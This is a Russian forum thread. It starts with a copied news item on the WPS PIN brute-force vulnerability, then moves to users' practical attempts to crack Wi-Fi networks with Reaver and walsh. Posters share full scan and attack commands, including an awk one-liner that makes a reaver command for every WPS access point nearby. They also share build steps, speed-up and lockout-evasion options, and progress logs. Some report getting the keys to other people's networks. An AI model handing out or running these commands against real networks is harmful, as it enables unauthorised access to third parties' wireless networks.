Уязвимость в протоколе Wi-Fi Protected Setup

Уязвимость в протоколе Wi-Fi Protected Setup

Организация US Computer Emergency Readiness Team опубликовала бюллетень безопасности, описывающий уязвимость в протоколе WPS (Wi-Fi Protected Setup), предназначенном для облегчения настройки безопасности беспроводных роутеров и сетей. Сам протокол — его оригинальное название Wi-Fi Simple Config — был разработан в 2009 году специалистами ассоциации Wi-Fi Alliance целью дать возможность с некоторой долей безопасности пользоваться Wi-Fi лицам, мало сведущим в протоколах и стойких методах шифрования.

Традиционно при создании новых WLAN необходимо было выбрать сетевое имя и кодовую фразу для точки доступа, а позднее то же самое — для каждого нового устройства, добавляемого к сети. WPS для упрощения процедуры для конечного пользователя возлагает функцию генерации сетевого имени на саму точку доступа. Для добавления нового клиентского устройства к защищенной сети достаточно будет ввести PIN-код из 4 или 8 цифр или нажать на специальные клавиши, имеющиеся на роутере и добавляемом устройстве.

Суть уязвимости заключается в специфике общения между собой точки доступа и новым беспроводным устройством. Злоумышленник, желая получить доступ к сети жертвы, посылает некий PIN-код для аутентификации на роутере. В ответ на неправильный PIN посылается EAP-NACK сообщение таким образом, что хакер способен определить первую половину цифр PIN-кода, а вторую половину оказывается возможным определить, анализируя контрольную сумму при передаче PIN. Все это приводит к тому, что атака методом «грубой силы», вероятней всего, завершится успехом, поскольку число необходимых попыток уменьшается с 10^8 до 10^4+10^3 = 11.000, а время полного перебора PIN-кодов составит от нескольких часов до нескольких суток, в зависимости от реализации WPS на роутере.

Пока решения проблемы не существует и тем, у кого роутер настроен на упрощенную схему безопасности, рекомендуется использовать традиционную схему аутентификации. Netgear, D-Link, Belkin и другие производители пока не прокомментировали сообщение об уязвимости.

Копипаст с хабра
Документ с описанием уязвимости (англ.)
Добрые люди уже написали WPS брутфорсер

любые вопросы не по теме удаляются !! выкладывать только инфу WPS , (reaver) ​

// добавлено в карту раздела. ​

за троль оффтоп , бан от 7 суток . ​

 

никто не компилил?
скрипт на питоне от самого автора
http://dl.dropbox.com/u/22108808/wpscrack.zip

 

попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]

 

Стоит, наверное, обновить Reaver с помощью svn up, проблема ассоциации была решена. У меня, к сожалению, на роутере Netgear WNR3500L не работает WPS по причине установленной прошивки Tomato-USB. На чужих сетях ничего не получается, хотя Wireshark и показывает наличие настроенного WPS. У кого-нибудь уже получалось подобрать PIN и получить WPA-PSK?

 

У меня не получилось и не получится.... А жаль.
ТД организована не на базе роутера, а по-взрослому - Ubiquiti. А там такая дырявая вещь, как WPS не применяется....

 

Простите новичка, а как определить в Wireshark, что включен WPS ? Может фильтр какой есть ?

 

ассоциация есть, но дальше ничего, пробовал 2 раза по 5 минут ждать

root@bt:~# reaver -i mon0 -b ------------

Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from ------------
[+] Associated with ------------ (ESSID: ------------)
[+] 0.00% complete @ 0 seconds/attempt
[+] 0.00% complete @ 0 seconds/attempt

буду на других точках пробовать

 

Я ставил фильтр: wps.wifi_protected_setup_state == 0x02
Мог и ошибиться, конечно, но в любом случае копать в тег-параметры (vendor specific) beacon-пакетов.

P.S. сейчас в Reaver есть программа walsh, которая показывает точки со включённой WPS.

 

поподробнее про walsh плз

 

Например -
walsh -i mon0 -o WPS.list
grep -v "bad FCS" WPS.list

и полусаем, что-то вроде -
Scanning for supported APs...

54:E6:FC1:18:F6 (null)
D8:5D:4C:F3:44:6A ApptNet
00:22:75:52:BD:4E Belkin_N_Wireless_52bd4e
00:1D:7E:B4:1F:B6 lafferty
00:19:150:5C:29 WLAN_5C29
00:24:17:BB:44:BD ThomsonE4849E
00:50:7F:7C:E5:F8 Ellie
-----------------------------------------
Можно коммандный файл сгенерить -
awk '/[0-9][A-F]/{print "reaver -i mon0 -b "$1" -e "$2}' WPS.list
---------------------------------------------------------------
У меня пока безуспешно ... Пару раз проскакивало -
[+] Trying pin 84490445
Но дальше не продвигается.
Кстати , walsh ловит ВСЕ точки c WPS и OPEN (без шифрования тоже)

Напустил его на OPEN точку, работает ...
[+] Waiting for beacon from 00:22:75:52:BD:4E
[+] Associated with 00:22:75:52:BD:4E (ESSID: Belkin_N_Wireless_52bd4e)
[+] 0.01% complete @ 37 seconds/attempt
[+] 0.03% complete @ 20 seconds/attempt
[+] 0.05% complete @ 19 seconds/attempt
[+] 0.07% complete @ 16 seconds/attempt
[+] 0.08% complete @ 31 seconds/attempt

 

Зацепился за одну из точек, но процесс идёт очень медленно.
За 4 часа прогресс такой -
[+] 9.35% complete @ 15 seconds/attempt
[+] 9.39% complete @ 15 seconds/attempt

Похоже, режультат будет видно через пару суток
Надеюсь будет положительный

 

странно я когда walsh прописываю пишет не существует типо такого...

 

Скомпилируй последний билд из SVN

Code:

svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
cd reaver-wps-read-only/src
./configure
make
make install

Проект активно развивается, перед запуском на долгие сутки, лучше пересобрать свежачок ...

Для ускорения перебора, можно уменьшать тайминги здесь -

Code:

Advanced Options:
	-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
	-d, --delay=<seconds>           Set the delay between pin attempts [1]
	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
	-g, --max-attempts=<num>        Quit after num pin attempts
	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
	-t, --timeout=<seconds>         Set the receive timeout perio [5]
	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
	-L, --ignore-locks              Ignore locked state reported by the target AP
	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
	-n, --nack                      Target AP always sends a NACK [Auto]
	-w, --win7                      Mimic a Windows 7 registrar [False]

Согласно доке, если AP не блокирует, то время перебора будет
не более 4 часов.
Если придерживаться спецификаций WSC 2.0, перебор может продолжатться до 65 часов.
С дефолтными настройками, оно так и будет.

 

zuriuslev

главное дождаться результата!

 

Дождусь ! У меня вся эта байда на UPS А UPS всю эту байду, часов 5 продержит

Кстати, 6 часов назад, автор внёс новые опции для ускорения процесса -

Code:

Added --dh-small option for speed improvements.

 

Scapy http://www.secdev.org/projects/scapy/

пишут ещё PyCrypto нужен, но мне на батраке не понадобилcя, наверное есть уже

 

у меня Backtrack5 r1 x86 и awus036nh (Ralink RT2870/3070 rt2800usb) установил драйвер compat-wireless-2012-01-03
./walsh -i mon0 -C -s увидеть нужные сети
http://s010.radikal.ru/i311/1201/a2/b94e218e3e2a.png
работает!

 

какие добавлял опции к команде: reaver -i mon0 -b ------------
или так по умолчанию и использовал ?

а вообще здорово за 4 часа, а у меня разрывает ассоциацию ((

 

Поздравляю . Мньше чем за 4 часа. А ключик проверили ?

У мня уже почти 18 часов крутится, но должно скоро закончиться

Code:

[+] 97.30% complete @ 10 seconds/attempt
[+] 97.35% complete @ 10 seconds/attempt
[+] 97.39% complete @ 10 seconds/attempt

Сейчас опять очередной лок от АП ... значит 5 минут ждёмс ...
У меня в начале было 16 seconds/attempt, а на финише 10 seconds/attempt.
НО ! Похоже участились локи

 

Опции reaver -i mon0 -b x:x:x:x:x:x -vv --dh-small используйте эту опцию намного быстрее заметил что не на всех точках работает только с теми где хороший сигнал. Ключик подходит.

если локи пошли Ctrl+C тамже написано [+] Session saved. Сессия сохранена если начнеш опять она возобновится (главное подождать чтоб точка очухалась) с того же места но это в версии Reaver v1.3 в v1.2 не замечал сохранений

Если у кого-то не получается попробуйте обновить драйвер мне помогло
Перед использованием посмотрите подходит ваш драйвер или нет:
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers

вторая точка готова